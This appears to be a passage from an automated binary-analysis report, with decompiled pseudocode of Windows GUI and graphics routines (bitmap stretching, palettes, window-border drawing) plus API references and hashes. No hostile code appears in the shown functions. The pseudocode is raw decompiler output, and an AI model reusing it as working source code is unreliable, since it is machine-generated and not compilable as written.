						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x46a6df, _t493);
						 *((intOrPtr*)( *_v16 + 0x34))();
						E00412AB0(0, _t486, 0,  &_v44, _t491);
						E0041F7B8( *((intOrPtr*)(E004246E8(_v16) + 0x14)), _t486, 0x8000000f, _t486, _t493, _t503);
						E00423EB0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
						 *((intOrPtr*)( *_v16 + 0x38))();
						if(_v9 >=  *(_v8 + 0x20)) {
						}
						E00412AB0(0 * _t486, 1 * _t486, 0,  &_v60, _t491);
						_t209 = _v9 - 1;
						_t506 = _t209;
						if(_t506 < 0) {
							L14:
							_push( &_v60);
							_t213 = E004246E8( *((intOrPtr*)(_v8 + 4)));
							E0041FCE8(E004246E8(_v16),  &_v44, _t507, _t213);
							_t218 =  *((intOrPtr*)(_v8 + 4));
							_t508 =  *((char*)(_t218 + 0x38)) - 1;
							if( *((char*)(_t218 + 0x38)) != 1) {
								 *((intOrPtr*)(_v8 + 0xc)) = E00469DC8( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
							} else {
								 *((intOrPtr*)(_v8 + 0xc)) = E00469DC8( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t508);
							}
							goto L23;
						} else {
							if(_t506 == 0) {
								_v24 = 0;
								_v20 = 0;
								 *[fs:eax] = _t496;
								_v24 = E00424120(1);
								_v20 = E00424120(1);
								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x46a6a3, _t493);
								 *((intOrPtr*)( *_v20 + 0x6c))();
								_t241 = _v8;
								__eflags =  *((char*)(_t241 + 0x20)) - 1;
								if( *((char*)(_t241 + 0x20)) <= 1) {
									 *((intOrPtr*)( *_v24 + 8))();
									 *((intOrPtr*)( *_v24 + 0x6c))();
									E0041F7B8( *((intOrPtr*)(E004246E8(_v24) + 0x14)),  *_v24, 0, _t486, _t493, __eflags);
									_t415 =  *_v24;
									 *((intOrPtr*)( *_v24 + 0x40))();
									_t254 = E004247A4(_v24);
									__eflags = _t254;
									if(_t254 != 0) {
										E0041EFCC( *((intOrPtr*)(E004246E8(_v24) + 0xc)), 0xffffff);
										__eflags = 0;
										E00425598(_v24, 0);
										E0041F7B8( *((intOrPtr*)(E004246E8(_v24) + 0x14)), _t415, 0xffffff, _t486, _t493, __eflags);
									}
									E00425598(_v24, 1);
									_t391 = E004246E8(_v16);
									E0041F7B8( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x8000000f, _t486, _t493, __eflags);
									E0041FE50(_t258,  &_v44);
									E0041F7B8( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x80000014, _t486, _t493, __eflags);
									SetTextColor(E00420244(_t391), 0);
									SetBkColor(E00420244(_t391), 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(1);
									_push(1);
									_push(E00420244(_t391));
									L00406A38();
									E0041F7B8( *((intOrPtr*)(_t391 + 0x14)), _t415, 0x80000010, _t486, _t493, __eflags);
									SetTextColor(E00420244(_t391), 0);
									SetBkColor(E00420244(_t391), 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(E00420244(_t391));
									L00406A38();
								} else {
									_v28 = E004246E8(_v16);
									E004246E8(_v20);
									E0041FCE8(_v28,  &_v44, __eflags,  &_v60);
									E00425598(_v24, 1);
									 *((intOrPtr*)( *_v24 + 0x40))();
									 *((intOrPtr*)( *_v24 + 0x34))();
									E0041F7B8( *((intOrPtr*)(E004246E8(_v20) + 0x14)),  *_v24, 0xffffff, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E004246E8(_v20));
									_t325 = E004246E8(_v24);
									_pop(_t421);
									E0041FCE8(_t325,  &_v44, __eflags);
									E0041F7B8( *((intOrPtr*)(_v28 + 0x14)), _t421, 0x80000014, _t486, _t493, __eflags);
									_t392 = E00420244(_v28);
									SetTextColor(_t392, 0);
									SetBkColor(_t392, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t392);
									L00406A38();
									E0041F7B8( *((intOrPtr*)(E004246E8(_v20) + 0x14)), _t421, 0x808080, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E004246E8(_v20));
									_t345 = E004246E8(_v24);
									_pop(_t422);
									E0041FCE8(_t345,  &_v44, __eflags);
									E0041F7B8( *((intOrPtr*)(_v28 + 0x14)), _t422, 0x80000010, _t486, _t493, __eflags);
									_t393 = E00420244(_v28);
									SetTextColor(_t393, 0);
									SetBkColor(_t393, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t393);
									L00406A38();
									_push(E0041EB0C( *((intOrPtr*)(_v8 + 0x1c))));
									_t361 = E004246E8(_v20);
									_pop(_t478);
									E0041F7B8( *((intOrPtr*)(_t361 + 0x14)), _t422, _t478, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E004246E8(_v20));
									_t368 = E004246E8(_v24);
									_pop(_t423);
									E0041FCE8(_t368,  &_v44, __eflags);
									E0041F7B8( *((intOrPtr*)(_v28 + 0x14)), _t423, 0x8000000f, _t486, _t493, __eflags);
									_t394 = E00420244(_v28);
									SetTextColor(_t394, 0);
									SetBkColor(_t394, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t394);
									L00406A38();
								}
								__eflags = 0;
								_pop(_t464);
								 *[fs:eax] = _t464;
								_push(0x46a6aa);
								E004035B4(_v20);
								return E004035B4(_v24);
							} else {
								_t507 = _t209 - 0xffffffffffffffff;
								if(_t209 - 0xffffffffffffffff < 0) {
									goto L14;
								}
								L23:
								_pop(_t447);
								 *[fs:eax] = _t447;
								_push(0x46a6e6);
								return E004035B4(_v16);
							}
						}
					}
				}
			}

0x0046a131
0x0046a133
0x0046a139
0x0046a13c
0x0046a143
0x0046a14e
0x0046a14e
0x0046a15a
0x0046a161
0x0046a6fd
0x0046a705
0x0046a167
0x0046a16f
0x0046a181
0x00000000
0x0046a187
0x0046a18f
0x0046a19b
0x0046a19e
0x0046a1ab
0x0046a1b4
0x0046a1b6
0x0046a1bd
0x0046a1cb
0x0046a1cb
0x0046a1d4
0x0046a1e1
0x0046a1e1
0x0046a1f0
0x0046a1fe
0x0046a208
0x0046a212
0x0046a220
0x0046a235
0x0046a245
0x0046a251
0x0046a25d
0x0046a25d
0x0046a276
0x0046a27e
0x0046a27e
0x0046a280
0x0046a28d
0x0046a290
0x0046a297
0x0046a2a9
0x0046a2b1
0x0046a2b4
0x0046a2b8
0x0046a2fa
0x0046a2ba
0x0046a2d6
0x0046a2d6
0x00000000
0x0046a282
0x0046a282
0x0046a305
0x0046a30a
0x0046a318
0x0046a327
0x0046a336
0x0046a344
0x0046a34e
0x0046a351
0x0046a354
0x0046a358
0x0046a541
0x0046a54b
0x0046a55b
0x0046a565
0x0046a567
0x0046a56d
0x0046a572
0x0046a574
0x0046a586
0x0046a58b
0x0046a590
0x0046a5a5
0x0046a5a5
0x0046a5af
0x0046a5bc
0x0046a5c6
0x0046a5d0
0x0046a5dd
0x0046a5ec
0x0046a5fe
0x0046a603
0x0046a608
0x0046a60a
0x0046a619
0x0046a61a
0x0046a61b
0x0046a61c
0x0046a61e
0x0046a627
0x0046a628
0x0046a635
0x0046a644
0x0046a656
0x0046a65b
0x0046a660
0x0046a662
0x0046a671
0x0046a672
0x0046a673
0x0046a674
0x0046a676
0x0046a67f
0x0046a680
0x0046a35e
0x0046a366
0x0046a370
0x0046a37d
0x0046a387
0x0046a393
0x0046a39d
0x0046a3b0
0x0046a3b8
0x0046a3c1
0x0046a3c5
0x0046a3cd
0x0046a3ce
0x0046a3de
0x0046a3eb
0x0046a3f0
0x0046a3fb
0x0046a400
0x0046a405
0x0046a407
0x0046a416
0x0046a417
0x0046a418
0x0046a419
0x0046a41b
0x0046a41d
0x0046a41e
0x0046a433
0x0046a43b
0x0046a444
0x0046a448
0x0046a450
0x0046a451
0x0046a461
0x0046a46e
0x0046a473
0x0046a47e
0x0046a483
0x0046a488
0x0046a48a
0x0046a499
0x0046a49a
0x0046a49b
0x0046a49c
0x0046a49e
0x0046a4a0
0x0046a4a1
0x0046a4b1
0x0046a4b5
0x0046a4bd
0x0046a4be
0x0046a4c6
0x0046a4cf
0x0046a4d3
0x0046a4db
0x0046a4dc
0x0046a4ec
0x0046a4f9
0x0046a4fe
0x0046a509
0x0046a50e
0x0046a513
0x0046a515
0x0046a524
0x0046a525
0x0046a526
0x0046a527
0x0046a529
0x0046a52b
0x0046a52c
0x0046a52c
0x0046a685
0x0046a687
0x0046a68a
0x0046a68d
0x0046a695
0x0046a6a2
0x0046a284
0x0046a285
0x0046a287
0x00000000
0x00000000
0x0046a6c9
0x0046a6cb
0x0046a6ce
0x0046a6d1
0x0046a6de
0x0046a6de
0x0046a282
0x0046a280
0x0046a181

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33bad8e59a3afc72a6aa36e04e0b52a2b3eebe3d04c78215072205f3ab4cccd4
Instruction ID: 47c3eab816d7371ae8d8058d6e4512fc1a5e86abf49d724e198f2369b07f6b98
Opcode Fuzzy Hash: 33bad8e59a3afc72a6aa36e04e0b52a2b3eebe3d04c78215072205f3ab4cccd4
Instruction Fuzzy Hash: E0026174B001149FC700EBA9D886E9EB7F5EF49304F5140AAF805BB392CA78ED45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00424418, Relevance: 21.2, APIs: 14, Instructions: 217
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00424418(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t74;
				struct HDC__* _t76;
				signed int _t78;
				signed int _t79;
				char _t80;
				void* _t87;
				struct HDC__* _t110;
				void* _t131;
				struct HDC__* _t155;
				intOrPtr* _t159;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				int* _t179;
				intOrPtr _t181;
				void* _t183;
				void* _t184;
				intOrPtr _t185;

				_t160 = __ecx;
				_t183 = _t184;
				_t185 = _t184 + 0xffffffe4;
				_t179 = __ecx;
				_v8 = __edx;
				_t159 = __eax;
				_t181 =  *((intOrPtr*)(__eax + 0x28));
				_t167 =  *0x424664; // 0xf
				E00420318(_v8, __ecx, _t167);
				E00424A88(_t159);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *((intOrPtr*)(_t181 + 0x10));
				if(_t74 != 0) {
					_push(0xffffffff);
					_push(_t74);
					_t155 =  *(_v8 + 4);
					_push(_t155);
					L00406BD8();
					_v12 = _t155;
					_push( *(_v8 + 4));
					L00406BA8();
					_v13 = 1;
				}
				_push(0xc);
				_t76 =  *(_v8 + 4);
				_push(_t76);
				L00406B00();
				_push(_t76);
				_push(0xe);
				_t78 =  *(_v8 + 4);
				L00406B00();
				_t168 = _t78;
				_t79 = _t168 * _t78;
				if(_t79 > 8) {
					L4:
					_t80 = 0;
				} else {
					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
						_t80 = 1;
					} else {
						goto L4;
					}
				}
				if(_t80 == 0) {
					if(E004247A4(_t159) == 0) {
						SetStretchBltMode(E00420244(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t183);
				_push(0x424655);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
					E00424A28(_t159, _t160);
				}
				_t87 = E004246E8(_t159);
				_t171 =  *0x424664; // 0xf
				E00420318(_t87, _t160, _t171);
				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E004246E8(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
					_pop(_t173);
					 *[fs:eax] = _t173;
					_push(0x42465c);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t110 =  *(_v8 + 4);
						_push(_t110);
						L00406BD8();
						return _t110;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t183);
					_push(0x4245ea);
					_push( *[fs:eax]);
					 *[fs:eax] = _t185;
					L00406A60();
					_v28 = E0042063C(0);
					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
					E004207E0( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E004246E8(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
					_t131 = 0;
					_t175 = 0;
					 *[fs:eax] = _t175;
					_push(0x42462f);
					if(_v32 != 0) {
						_t131 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t131;
				}
			}

0x00424418
0x00424419
0x0042441b
0x00424421
0x00424423
0x00424426
0x00424428
0x0042442b
0x00424434
0x0042443b
0x00424442
0x00424445
0x00424449
0x0042444e
0x00424450
0x00424452
0x00424456
0x00424459
0x0042445a
0x0042445f
0x00424468
0x00424469
0x0042446e
0x0042446e
0x00424472
0x00424477
0x0042447a
0x0042447b
0x00424480
0x00424481
0x00424486
0x0042448a
0x0042448f
0x00424493
0x00424498
0x004244a9
0x004244a9
0x0042449a
0x0042449e
0x004244a7
0x004244ad
0x00000000
0x00000000
0x00000000
0x004244a7
0x004244b1
0x004244f4
0x00424501
0x00424501
0x004244b3
0x004244be
0x004244cc
0x004244e4
0x004244e4
0x00424508
0x00424509
0x0042450e
0x00424511
0x0042451d
0x00424521
0x00424521
0x00424528
0x0042452d
0x00424533
0x00424541
0x0042462a
0x00424631
0x00424634
0x00424637
0x00424640
0x00424642
0x00424647
0x0042464b
0x0042464e
0x0042464f
0x00000000
0x0042464f
0x00424654
0x00424547
0x00424549
0x0042454e
0x00424553
0x00424554
0x00424559
0x0042455c
0x00424561
0x0042456b
0x0042457b
0x004245b5
0x004245ba
0x004245bc
0x004245bf
0x004245c2
0x004245cb
0x004245d5
0x004245d5
0x004245de
0x00000000
0x004245e4
0x004245e9
0x004245e9

APIs

Part of subcall function 00424A88: 72E7AC50.USER32(00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424ADE
Part of subcall function 00424A88: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AF3
Part of subcall function 00424A88: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AFD
Part of subcall function 00424A88: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B21
Part of subcall function 00424A88: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B2C

72E7B410.GDI32(?,?,000000FF), ref: 0042445A
72E7B150.GDI32(?,?,?,000000FF), ref: 00424469
72E7AD70.GDI32(?,0000000C), ref: 0042447B
72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 0042448A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 004244BE
SetStretchBltMode.GDI32(?,00000004), ref: 004244CC
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 004244E4
SetStretchBltMode.GDI32(00000000,00000003), ref: 00424501
72E7A590.GDI32(00000000,00000000,004245EA,?,?,0000000E,00000000,?,0000000C), ref: 00424561
SelectObject.GDI32(?,?), ref: 00424576
SelectObject.GDI32(?,00000000), ref: 004245D5
DeleteDC.GDI32(00000000), ref: 004245E4

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
String ID:
API String ID: 2051775979-0
Opcode ID: 97c365144a95f33ef9c55f08ccb8b8949dde4d6c474002a7c25ea683272f980f
Instruction ID: c7bce11894e60d325533f11e34d51ac38df9cff0d4223dca934f8cec0068b5bf
Opcode Fuzzy Hash: 97c365144a95f33ef9c55f08ccb8b8949dde4d6c474002a7c25ea683272f980f
Instruction Fuzzy Hash: 637159B5B00215AFCB40EFA9D985F5EB7F8EB49304F51846AF609E7281D638ED40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042064C, Relevance: 21.1, APIs: 14, Instructions: 131
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0042064C(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00406A60();
				_v28 = __eax;
				_push(0);
				L00406A60();
				_v32 = __eax;
				_push(_t87);
				_push(0x42079a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00406E30();
					_v24 = _t37;
					if(_v24 == 0) {
						E00420594(__ecx);
					}
					_push(_t87);
					_push(0x420709);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00406A58();
					_v20 = _t41;
					if(_v20 == 0) {
						E00420594(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x420710);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00407090();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00406A48();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(E004207A1);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}

0x0042064d
0x0042064f
0x0042065a
0x0042065b
0x0042065c
0x0042065e
0x00420661
0x00420663
0x00420668
0x0042066b
0x0042066d
0x00420672
0x00420677
0x00420678
0x0042067d
0x00420680
0x0042068d
0x00420694
0x004206ae
0x004206b0
0x004206b5
0x004206bc
0x004206be
0x004206be
0x004206c5
0x004206c6
0x004206cb
0x004206ce
0x004206d4
0x004206d8
0x004206d9
0x004206dc
0x004206dd
0x004206e2
0x004206e9
0x004206eb
0x004206eb
0x004206f2
0x004206f5
0x004206f8
0x004206fd
0x00420700
0x00420701
0x00420703
0x00420708
0x00420696
0x00420696
0x00420698
0x0042069a
0x0042069f
0x004206a0
0x004206a3
0x004206a4
0x004206a9
0x00420714
0x00420723
0x00420732
0x00420759
0x00420760
0x00420767
0x00420767
0x0042076e
0x00420775
0x00420775
0x0042076e
0x0042077c
0x0042077f
0x00420782
0x0042078b
0x00420799
0x00420799

APIs

72E7A590.GDI32(00000000), ref: 00420663
72E7A590.GDI32(00000000,00000000), ref: 0042066D
GetObjectA.GDI32(?,00000018,?), ref: 0042068D
72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,0042079A,?,00000000,00000000), ref: 004206A4
72E7AC50.USER32(00000000,?,00000018,?,00000000,0042079A,?,00000000,00000000), ref: 004206B0
72E7A520.GDI32(00000000,?,?,00000000,00420709,?,00000000,?,00000018,?,00000000,0042079A,?,00000000,00000000), ref: 004206DD
72E7B380.USER32(00000000,00000000,00420710,00000000,00420709,?,00000000,?,00000018,?,00000000,0042079A,?,00000000,00000000), ref: 00420703
SelectObject.GDI32(?,?), ref: 0042071E
SelectObject.GDI32(?,00000000), ref: 0042072D
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00420759
SelectObject.GDI32(?,00000000), ref: 00420767
SelectObject.GDI32(?,00000000), ref: 00420775
DeleteDC.GDI32(?), ref: 0042078B
DeleteDC.GDI32(?), ref: 00420794

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$A590Delete$A410A520B380Stretch
String ID:
API String ID: 956127455-0
Opcode ID: 7a44f8c3aaf290c244923087a83e32b26611e6e1a7b93cae949dbf95e8e0c829
Instruction ID: d26a8547e5d6fdc07dcb9ddd540314c92d298950bde6cc003a7bc4477a197fa3
Opcode Fuzzy Hash: 7a44f8c3aaf290c244923087a83e32b26611e6e1a7b93cae949dbf95e8e0c829
Instruction Fuzzy Hash: A3412D71B00219AFDB00EBE9DC52FAFB7FCEB49704F514426B605F7281D67869108BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004401C8, Relevance: 19.7, APIs: 13, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004401C8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t115;
				void* _t166;
				intOrPtr* _t188;
				intOrPtr* _t191;
				void* _t200;
				intOrPtr _t207;
				signed int _t224;
				void* _t227;
				void* _t229;
				intOrPtr _t230;

				_t227 = _t229;
				_t230 = _t229 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t115 = E0043F370(_v8);
					_push(_t115);
					L00406F30();
					_v16 = _t115;
					_push(_t227);
					_push(0x44042e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t230;
					GetClientRect(E0043F370(_v8),  &_v32);
					GetWindowRect(E0043F370(_v8),  &_v48);
					MapWindowPoints(0, E0043F370(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t200 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t200 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t200 = _t200 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t224 = GetWindowLongA(E0043F370(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t200;
						}
						if((_t224 & 0x00200000) != 0) {
							_t191 =  *0x48e5b4; // 0x48fa94
							_v48.right = _v48.right +  *((intOrPtr*)( *_t191))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t200;
						}
						if((_t224 & 0x00100000) != 0) {
							_t188 =  *0x48e5b4; // 0x48fa94
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t188))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x47199c + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x4719ac + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x4719bc + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x4719cc + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041F7EC( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t207);
					 *[fs:eax] = _t207;
					_push(0x440435);
					_push(_v16);
					_t166 = E0043F370(_v8);
					_push(_t166);
					L00407090();
					return _t166;
				} else {
					return  *((intOrPtr*)( *_v8 - 0x10))();
				}
			}

0x004401c9
0x004401cb
0x004401d1
0x004401d4
0x004401e1
0x004401f6
0x004401fb
0x004401fc
0x00440201
0x00440206
0x00440207
0x0044020c
0x0044020f
0x0044021f
0x00440231
0x00440247
0x0044025c
0x00440275
0x00440280
0x00440281
0x00440282
0x00440283
0x00440293
0x0044029e
0x0044029f
0x004402a0
0x004402a1
0x004402ac
0x004402b2
0x004402be
0x004402c3
0x004402c3
0x004402d3
0x004402d8
0x004402d8
0x004402ee
0x004402fa
0x004402fc
0x004402fc
0x00440309
0x0044030b
0x0044030b
0x00440318
0x0044031a
0x0044031a
0x00440323
0x00440327
0x00440330
0x00440330
0x0044033d
0x0044033f
0x0044033f
0x00440348
0x0044034c
0x00440355
0x00440355
0x004403b5
0x004403b5
0x004403ce
0x004403d9
0x004403da
0x004403db
0x004403dc
0x004403ed
0x00440409
0x00440410
0x00440413
0x00440416
0x0044041e
0x00440422
0x00440427
0x00440428
0x0044042d
0x00440435
0x00440446
0x00440446

APIs

72E7B080.USER32(00000000), ref: 004401FC
GetClientRect.USER32 ref: 0044021F
GetWindowRect.USER32 ref: 00440231
MapWindowPoints.USER32 ref: 00440247
OffsetRect.USER32(?,?,?), ref: 0044025C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 00440275
InflateRect.USER32(?,00000000,00000000), ref: 00440293
GetWindowLongA.USER32 ref: 004402E9
DrawEdge.USER32(?,?,00000000,00000008), ref: 004403B5
IntersectClipRect.GDI32(?,?,?,?,?), ref: 004403CE
OffsetRect.USER32(?,?,?), ref: 004403ED
FillRect.USER32 ref: 00440409
72E7B380.USER32(00000000,?,00440435,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00440428

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

